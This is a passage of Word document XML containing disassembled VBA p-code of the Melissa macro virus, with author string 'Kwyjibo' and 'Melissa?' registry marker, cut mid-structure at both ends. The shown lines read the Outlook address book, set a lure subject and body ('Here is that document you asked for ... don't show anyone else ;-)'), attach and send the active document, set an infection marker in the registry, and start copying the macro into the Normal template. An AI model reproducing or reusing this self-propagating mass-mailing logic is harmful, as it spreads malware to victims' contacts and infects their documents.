    <w:p w14:paraId="14D0131D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D79F02B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #20:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FF50AE" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld x </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C6D962" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld AddyBook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518E6AF4" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd AddressEntries 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA9F146" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St Peep </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1599F415" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #21:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E358173" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld Peep </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B3FEFA" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BreakUmOffASlice </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1549B3BC" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd Recipients </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4780F0F6" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall Add 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A8FA04" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #22:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458C2D77" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld x </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB9090C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9CCA88" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50128D96" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St x </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CE8696" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #23:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780E1330" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld x </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F030B74" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0032 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DB3416" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Gt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6A0CC0" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75781D01" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">BoSImplicit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFDA7ED" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld AddyBook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1FEC9D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd AddressEntries </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC521BE" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd Count </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AC66A4" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St oo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEA7BB8" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67990906" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #24:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FC1A72" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">StartForVariable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068F7D81" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld oo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CE7B87" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndForVariable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1165D6B1" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">NextVar </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEA0651" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #25:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0105E0" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0017 "Important Message From "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754B41E8" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld Application </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632C51D2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd UserName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364BDEE6" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Concat </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B2EFD4" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BreakUmOffASlice </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A75C6D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt Subject </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D919538" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #26:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75165417" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0042 "Here is that document you asked for ... don't show anyone else ;-)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A4F2E2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BreakUmOffASlice </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7706C41B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt Body </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599E3153" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>' Line #27:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D71E30" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ActiveDocument </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BADD387" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd FullName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0698D5D0" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BreakUmOffASlice </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304F321A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd Attachments </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6941E95B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall Add 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A24710" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #28:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8D0616" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BreakUmOffASlice </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192F223B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall Send 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4040F9AA" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #29:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B6CC7F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACFE087" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St Peep </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E58450" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #30:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4711F922" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">StartForVariable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178F61CC" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld y </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A79DC8" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndForVariable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235CF739" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">NextVar </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4084F909" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #31:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48529201" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld DasMapiName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B811FF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall Logoff 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A97311E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #32:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6543F854" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9AA3B3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #33:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76870D86" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x000E "... by Kwyjibo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361EC57E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558B3755" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x002C "HKEY_CURRENT_USER\Software\Microsoft\Office\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D6996F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0008 "Melissa?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC92432" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld System </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7E6915" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemSt PrivateProfileString 0x0003 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42921914" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #34:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D8F4EB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1338E7B7" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>' Line #35:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091E1334" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SetStmt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D35C73" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048E8837" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ActiveDocument </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0C50B0" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd VBProject </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52805E4E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd VBComponents </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AEC59B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Item 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DF9B08" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454B65EF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #36:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78926E78" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SetStmt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A4D9F9" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634AD9FB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NormalTemplate </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499958AF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd VBProject </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEC1DFF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd VBComponents </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F47931B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Item 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E359FD" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FFF708" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #37:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B4C99F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA798D3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9EBC1B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CountOfLines </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A32F66" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St NTCL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365E42DB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #38:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5937AD7D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
